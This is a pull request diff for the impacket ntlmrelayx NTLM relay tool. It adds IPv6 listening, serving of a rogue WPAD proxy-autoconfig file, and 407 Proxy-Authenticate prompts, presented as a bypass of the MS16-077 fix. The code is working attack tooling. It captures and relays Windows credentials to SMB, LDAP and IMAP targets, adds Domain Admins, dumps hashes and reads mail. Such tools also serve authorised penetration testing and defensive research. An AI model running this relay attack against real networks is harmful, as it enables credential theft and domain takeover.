### PR TITLE
IPv6 compatibility and WPAD serving for MS16-077 bypass

### DIFF
--- a/examples/ntlmrelayx.py
+++ b/examples/ntlmrelayx.py
@@ -16,23 +16,23 @@
 # by cDc extended to many target protocols (SMB, MSSQL, LDAP, etc).
 # It receives a list of targets and for every connection received it
 # will choose the next target and try to relay the credentials. Also, if
-# specified, it will first to try authenticate against the client connecting 
+# specified, it will first to try authenticate against the client connecting
 # to us.
-# 
-# It is implemented by invoking a SMB and HTTP Server, hooking to a few 
+#
+# It is implemented by invoking a SMB and HTTP Server, hooking to a few
 # functions and then using the specific protocol clients (e.g. SMB, LDAP).
 # It is supposed to be working on any LM Compatibility level. The only way
 # to stop this attack is to enforce on the server SPN checks and or signing.
-# 
+#
 # If the target system is enforcing signing and a machine account was provided,
-# the module will try to gather the SMB session key through 
+# the module will try to gather the SMB session key through
 # NETLOGON (CVE-2015-0005)
 #
-# If the authentication against the targets succeed, the client authentication 
-# success as well and a valid connection is set against the local smbserver. 
-# It's up to the user to set up the local smbserver functionality. One option 
-# is to set up shares with whatever files you want to the victim thinks it's 
-# connected to a valid SMB server. All that is done through the smb.conf file or 
+# If the authentication against the targets succeed, the client authentication
+# success as well and a valid connection is set against the local smbserver.
+# It's up to the user to set up the local smbserver functionality. One option
+# is to set up shares with whatever files you want to the victim thinks it's
+# connected to a valid SMB server. All that is done through the smb.conf file or
 # programmatically.
 #
 
@@ -217,7 +217,7 @@ class LDAPAttack(Thread):
             logging.info('User is not a Domain Admin')
             if not dumpedDomain and self.config.dumpdomain:
                 #do this before the dump is complete because of the time this can take
-                dumpedDomain = True 
+                dumpedDomain = True
                 logging.info('Dumping domain info for first time')
                 domainDumper.domainDump()
                 logging.info('Domain info dumped into lootdir!')
@@ -235,7 +235,7 @@ class HTTPAttack(Thread):
         #Default action: Dump requested page to file, named username-targetname.html
 
         #You can also request any page on the server via self.client.session,
-        #for example with: 
+        #for example with:
         #result = self.client.session.get('http://secretserver/secretpage.html')
         #print result.content
 
@@ -360,10 +360,10 @@ if __name__ == '__main__':
                                                         'automatically (only valid with -tf)')
     parser.add_argument('-i','--interactive', action='store_true',help='Launch an smbclient/mssqlclient console instead'
                         'of executing a command after a successful relay. This console will listen locally on a '
-                        ' tcp port and can be reached with for example netcat.')    
+                        ' tcp port and can be reached with for example netcat.')
     # Interface address specification
     parser.add_argument('-ip','--interface-ip', action='store', metavar='INTERFACE_IP', help='IP address of interface to '
-                  'bind SMB and HTTP servers',default='0.0.0.0')
+                  'bind SMB and HTTP servers',default='')
 
     parser.add_argument('-ra','--random', action='store_true', help='Randomize target selection (HTTP server only)')
     parser.add_argument('-r', action='store', metavar = 'SMBSERVER', help='Redirect HTTP requests to a file:// path on SMBSERVER')
@@ -380,11 +380,16 @@ if __name__ == '__main__':
                         'interacting with the domain to grab a session key for signing, format is domain/machine_name')
     parser.add_argument('-machine-hashes', action="store", metavar = "LMHASH:NTHASH", help='Domain machine hashes, format is LMHASH:NTHASH')
     parser.add_argument('-domain', action="store", help='Domain FQDN or IP to connect using NETLOGON')
+    parser.add_argument('-socks', action='store_true', default=False,
+                        help='Launch a SOCKS proxy for the connection relayed')
+    parser.add_argument('-wh','--wpad-host', action='store',help='Enable serving a WPAD file for Proxy Authentication attack, '
+                                                                   'setting the proxy host to the one supplied.')
+    parser.add_argument('-wa','--wpad-auth-num', action='store',help='Prompt for authentication N times for clients without MS16-077 installed '
+                                                                   'before serving a WPAD file.')
+    parser.add_argument('-6','--ipv6', action='store_true',help='Listen on both IPv6 and IPv4')
 
     #SMB arguments
     smboptions = parser.add_argument_group("SMB client options")
-    smboptions.add_argument('-socks', action='store_true', default=False,
-                        help='Launch a SOCKS proxy for the connection relayed')
     smboptions.add_argument('-e', action='store', required=False, metavar = 'FILE', help='File to execute on the target system. '
                                      'If not specified, hashes will be dumped (secretsdump.py must be in the same directory)')
     smboptions.add_argument('-c', action='store', type=str, required=False, metavar = 'COMMAND', help='Command to execute on '
@@ -395,22 +400,22 @@ if __name__ == '__main__':
     mssqloptions = parser.add_argument_group("MSSQL client options")
     mssqloptions.add_argument('-q','--query', action='append', required=False, metavar = 'QUERY', help='MSSQL query to execute'
                         '(can specify multiple)')
-    
+
     #HTTP options (not in use for now)
     # httpoptions = parser.add_argument_group("HTTP client options")
     # httpoptions.add_argument('-q','--query', action='append', required=False, metavar = 'QUERY', help='MSSQL query to execute'
-    #                     '(can specify multiple)')   
+    #                     '(can specify multiple)')
 
     #LDAP options
     ldapoptions = parser.add_argument_group("LDAP client options")
-    ldapoptions.add_argument('--no-dump', action='store_false', required=False, help='Do not attempt to dump LDAP information') 
-    ldapoptions.add_argument('--no-da', action='store_false', required=False, help='Do not attempt to add a Domain Admin') 
+    ldapoptions.add_argument('--no-dump', action='store_false', required=False, help='Do not attempt to dump LDAP information')
+    ldapoptions.add_argument('--no-da', action='store_false', required=False, help='Do not attempt to add a Domain Admin')
 
-    #IMAP options 
+    #IMAP options
     imapoptions = parser.add_argument_group("IMAP client options")
     imapoptions.add_argument('-k','--keyword', action='store', metavar="KEYWORD", required=False, default="password", help='IMAP keyword to search for. '
                         'If not specified, will search for mails containing "password"')
-    imapoptions.add_argument('-m','--mailbox', action='store', metavar="MAILBOX", required=False, default="INBOX", help='Mailbox name to dump. Default: INBOX') 
+    imapoptions.add_argument('-m','--mailbox', action='store', metavar="MAILBOX", required=False, default="INBOX", help='Mailbox name to dump. Default: INBOX')
     imapoptions.add_argument('-a','--all', action='store_true', required=False, help='Instead of searching for keywords, '
                         'dump all emails')
     imapoptions.add_argument('-im','--imap-max', action='store',type=int, required=False,default=0, help='Max number of emails to dump '
@@ -478,6 +483,8 @@ if __name__ == '__main__':
         c.setMSSQLOptions(options.query)
         c.setInteractive(options.interactive)
         c.setIMAPOptions(options.keyword,options.mailbox,options.all,options.imap_max)
+        c.setIPv6(options.ipv6)
+        c.setWpadOptions(options.wpad_host, options.wpad_auth_num)
         c.setInterfaceIp(options.interface_ip)
 
         #If the redirect option is set, configure the HTTP server to redirect targets to SMB
@@ -498,7 +505,7 @@ if __name__ == '__main__':
 
         s = server(c)
         s.start()
-        
+
     print ""
     logging.info("Servers started, waiting for connections")
     while True:

--- a/impacket/examples/ntlmrelayx/clients/httprelayclient.py
+++ b/impacket/examples/ntlmrelayx/clients/httprelayclient.py
@@ -8,7 +8,7 @@
 # Author:
 #   Dirk-jan Mollema / Fox-IT (https://www.fox-it.com)
 #
-# Description: 
+# Description:
 # HTTP(s) client for relaying NTLMSSP authentication to webservers
 #
 import logging
@@ -47,7 +47,7 @@ class HTTPRelayClient:
             if 'NTLM' not in res.getheader('WWW-Authenticate'):
                 logging.error('NTLM Auth not offered by URL, offered protocols: %s' % res.getheader('WWW-Authenticate'))
                 return False
-        except KeyError:
+        except (KeyError, TypeError):
             logging.error('No authentication requested by the server for url %s' % self.target)
             return False
 

--- a/impacket/examples/ntlmrelayx/servers/httprelayserver.py
+++ b/impacket/examples/ntlmrelayx/servers/httprelayserver.py
@@ -12,10 +12,11 @@
 #  Dirk-jan Mollema / Fox-IT (https://www.fox-it.com)
 #
 # Description:
-#             This is the HTTP server which relays the NTLMSSP 
+#             This is the HTTP server which relays the NTLMSSP
 #   messages to other protocols
 import SimpleHTTPServer
 import SocketServer
+import socket
 import base64
 import logging
 import random
@@ -36,6 +37,11 @@ class HTTPRelayServer(Thread):
     class HTTPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
         def __init__(self, server_address, RequestHandlerClass, config):
             self.config = config
+            self.daemon_threads = True
+            if self.config.ipv6:
+                self.address_family = socket.AF_INET6
+            # Tracks the number of times authentication was prompted for WPAD per client
+            self.wpad_counters = {}
             SocketServer.TCPServer.__init__(self,server_address, RequestHandlerClass)
 
     class HTTPHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
@@ -49,6 +55,7 @@ class HTTPRelayServer(Thread):
             self.machineHashes = None
             self.domainIp = None
             self.authUser = None
+            self.wpad = 'function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1")) return "DIRECT"; if (dnsDomainIs(host, "%s")) return "DIRECT"; return "PROXY %s:80; DIRECT";} '
             if self.server.config.mode != 'REDIRECT':
                 if self.server.config.target is None:
                     # Reflection mode, defaults to SMB at the target, for now
@@ -76,20 +83,46 @@ class HTTPRelayServer(Thread):
                 return self.do_GET()
             return SimpleHTTPServer.SimpleHTTPRequestHandler.send_error(self,code,message)
 
+        def serve_wpad(self):
+            self.wpad = self.wpad % (self.server.config.wpad_host, self.server.config.wpad_host)
+            self.send_response(200)
+            self.send_header('Content-type', 'application/x-ns-proxy-autoconfig')
+            self.send_header('Content-Length',len(self.wpad))
+            self.end_headers()
+            self.wfile.write(self.wpad)
+            return
+
+        def should_serve_wpad(self, client):
+            # If the client was already prompted for authentication, see how many times this happened
+            try:
+                num = self.server.wpad_counters[client]
+            except KeyError:
+                num = 0
+            self.server.wpad_counters[client] = num + 1
+            # Serve WPAD if we passed the authentication offer threshold
+            if num >= self.server.config.wpad_auth_num:
+                return True
+            else:
+                return False
+
         def do_HEAD(self):
             self.send_response(200)
             self.send_header('Content-type', 'text/html')
             self.end_headers()
 
-        def do_AUTHHEAD(self, message = ''):
-            self.send_response(401)
-            self.send_header('WWW-Authenticate', message)
+        def do_AUTHHEAD(self, message = '', proxy=False):
+            if proxy:
+                self.send_response(407)
+                self.send_header('Proxy-Authenticate', message)
+            else:
+                self.send_response(401)
+                self.send_header('WWW-Authenticate', message)
             self.send_header('Content-type', 'text/html')
             self.send_header('Content-Length','0')
             self.end_headers()
 
         #Trickery to get the victim to sign more challenges
-        def do_REDIRECT(self):
+        def do_REDIRECT(self, proxy=False):
             rstr = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(10))
             self.send_response(302)
             self.send_header('WWW-Authenticate', 'NTLM')
@@ -107,26 +140,55 @@ class HTTPRelayServer(Thread):
             self.send_header('Connection','close')
             self.end_headers()
 
+        def do_POST(self):
+            return self.do_GET()
+
+        def do_CONNECT(self):
+            return self.do_GET()
+
+        def do_HEAD(self):
+            return self.do_GET()
+
         def do_GET(self):
             messageType = 0
             if self.server.config.mode == 'REDIRECT':
                 self.do_SMBREDIRECT()
                 return
 
-            if self.headers.getheader('Authorization') is None:
-                self.do_AUTHHEAD(message = 'NTLM')
+            logging.info('HTTPD: Client requested path: %s' % self.path.lower())
+
+            # Serve WPAD if:
+            # - The client requests it
+            # - A WPAD host was provided in the command line options
+            # - The client has not exceeded the wpad_auth_num threshold yet
+            if self.path.lower() == '/wpad.dat' and self.server.config.serve_wpad and self.should_serve_wpad(self.client_address[0]):
+                logging.info('HTTPD: Serving PAC file to client %s' % self.client_address[0])
+                self.serve_wpad()
+                return
+
+            # Determine if the user is connecting to our server directly or attempts to use it as a proxy
+            if self.command == 'CONNECT' or (len(self.path) > 4 and self.path[:4].lower() == 'http'):
+                proxy = True
+            else:
+                proxy = False
+
+            if (proxy and self.headers.getheader('Proxy-Authorization') is None) or (not proxy and self.headers.getheader('Authorization') is None):
+                self.do_AUTHHEAD(message = 'NTLM',proxy=proxy)
                 pass
             else:
-                typeX = self.headers.getheader('Authorization')
+                if proxy:
+                    typeX = self.headers.getheader('Proxy-Authorization')
+                else:
+                    typeX = self.headers.getheader('Authorization')
                 try:
                     _, blob = typeX.split('NTLM')
                     token = base64.b64decode(blob.strip())
                 except:
-                    self.do_AUTHHEAD()
+                    self.do_AUTHHEAD(message = 'NTLM', proxy=proxy)
                 messageType = struct.unpack('<L',token[len('NTLMSSP\x00'):len('NTLMSSP\x00')+4])[0]
 
             if messageType == 1:
-                if not self.do_ntlm_negotiate(token):
+                if not self.do_ntlm_negotiate(token, proxy=proxy):
                     #Connection failed
                     self.server.config.target.log_target(self.client_address[0],self.target)
                     self.do_REDIRECT()
@@ -144,7 +206,7 @@ class HTTPRelayServer(Thread):
                         self.do_REDIRECT()
                     else:
                         #If it was an anonymous login, send 401
-                        self.do_AUTHHEAD('NTLM')
+                        self.do_AUTHHEAD('NTLM', proxy=proxy)
                 else:
                     # Relay worked, do whatever we want here...
                     logging.info("Authenticating against %s as %s\%s SUCCEED" % (
@@ -166,9 +228,9 @@ class HTTPRelayServer(Thread):
                     self.send_header('Content-Length','0')
                     self.send_header('Connection','close')
                     self.end_headers()
-            return 
+            return
 
-        def do_ntlm_negotiate(self,token):
+        def do_ntlm_negotiate(self,token, proxy):
             if self.target[0] == 'SMB':
                 try:
                     self.client = SMBRelayClient(self.target[1], extended_security = True)
@@ -178,7 +240,7 @@ class HTTPRelayServer(Thread):
                     negotiate.fromString(token)
                     #Remove the signing flag
                     negotiate['flags'] ^= ntlm.NTLMSSP_NEGOTIATE_ALWAYS_SIGN
-                    clientChallengeMessage = self.client.sendNegotiate(negotiate.getData()) 
+                    clientChallengeMessage = self.client.sendNegotiate(negotiate.getData())
                 except Exception, e:
                     logging.error("Connection against target %s FAILED" % self.target[1])
                     logging.error(str(e))
@@ -194,7 +256,7 @@ class HTTPRelayServer(Thread):
                     logging.error("Connection against target %s FAILED" % self.target[1])
                     logging.error(str(e))
                     return False
-            
+
             if self.target[0] == 'LDAP' or self.target[0] == 'LDAPS':
                 try:
                     self.client = LDAPRelayClient("%s://%s:%d" % (self.target[0].lower(),self.target[1],self.target[2]))
@@ -230,13 +292,13 @@ class HTTPRelayServer(Thread):
             #Calculate auth
             self.challengeMessage = ntlm.NTLMAuthChallenge()
             self.challengeMessage.fromString(clientChallengeMessage)
-            self.do_AUTHHEAD(message = 'NTLM '+base64.b64encode(self.challengeMessage.getData()))
+            self.do_AUTHHEAD(message = 'NTLM '+base64.b64encode(self.challengeMessage.getData()), proxy=proxy)
             return True
-        
+
         def do_ntlm_auth(self,token,authenticateMessage):
             #For some attacks it is important to know the authenticated username, so we store it
             self.authUser = authenticateMessage['user_name']
-            
+
             #TODO: What is this 127.0.0.1 doing here? Maybe document specific use case
             if authenticateMessage['user_name'] != '' or self.target[1] == '127.0.0.1':
                 respToken2 = SPNEGO_NegTokenResp()

--- a/impacket/examples/ntlmrelayx/servers/smbrelayserver.py
+++ b/impacket/examples/ntlmrelayx/servers/smbrelayserver.py
@@ -19,6 +19,7 @@ from threading import Thread
 import ConfigParser
 import struct
 import logging
+import socket
 
 from impacket import smb, ntlm
 from impacket.nt_errors import STATUS_MORE_PROCESSING_REQUIRED, STATUS_ACCESS_DENIED, STATUS_SUCCESS
@@ -63,6 +64,10 @@ class SMBRelayServer(Thread):
         smbConfig.set('IPC$','read only','yes')
         smbConfig.set('IPC$','share type','3')
         smbConfig.set('IPC$','path','')
+
+        # Change address_family to IPv6 if this is configured
+        if self.config.ipv6:
+            SMBSERVER.address_family = socket.AF_INET6
 
         # changed to dereference configuration interfaceIp
         self.server = SMBSERVER((config.interfaceIp,445), config_parser = smbConfig)
@@ -490,6 +495,7 @@ class SMBRelayServer(Thread):
             clientThread.start()
 
     def _start(self):
+        self.server.daemon_threads=True
         self.server.serve_forever()
 
     def run(self):

--- a/impacket/examples/ntlmrelayx/utils/config.py
+++ b/impacket/examples/ntlmrelayx/utils/config.py
@@ -11,7 +11,7 @@
 #  Dirk-jan Mollema / Fox-IT (https://www.fox-it.com)
 #
 # Description:
-#     Configuration class which holds the config specified on the 
+#     Configuration class which holds the config specified on the
 # command line, this can be passed to the tools' servers and clients
 class NTLMRelayxConfig:
     def __init__(self):
@@ -32,6 +32,13 @@ class NTLMRelayxConfig:
         self.lootdir = None
         self.randomtargets = False
         self.encoding = None
+        self.ipv6 = False
+
+        #WPAD options
+        self.serve_wpad = False
+        self.wpad_host = None
+        self.wpad_auth_num = 0
+        self.smb2support = False
 
         #SMB options
         self.exeFile = None
@@ -102,3 +109,12 @@ class NTLMRelayxConfig:
         self.mailbox = mailbox
         self.dump_all = dump_all
         self.dump_max = dump_max
+
+    def setIPv6(self, use_ipv6):
+        self.ipv6 = use_ipv6
+
+    def setWpadOptions(self, wpad_host, wpad_auth_num):
+        if wpad_host != None:
+            self.serve_wpad = True
+        self.wpad_host = wpad_host
+        self.wpad_auth_num = wpad_auth_num

--- a/impacket/smbserver.py
+++ b/impacket/smbserver.py
@@ -3643,7 +3643,8 @@ class Ioctls:
 class SMBSERVERHandler(SocketServer.BaseRequestHandler):
     def __init__(self, request, client_address, server, select_poll = False):
         self.__SMB = server
-        self.__ip, self.__port = client_address
+        # In case of AF_INET6 the client_address contains 4 items, ignore the last 2
+        self.__ip, self.__port = client_address[:2]
         self.__request = request
         self.__connId = threading.currentThread().getName()
         self.__timeOut = 60*5


### PR DESCRIPTION
- Added the ability to listen on IPv6 as well as IPv4
- Added option to serve a WPAD file
- Added automatic prompts for 407 Proxy-Authorization if a client attempts to use ntlmrelayx as a proxy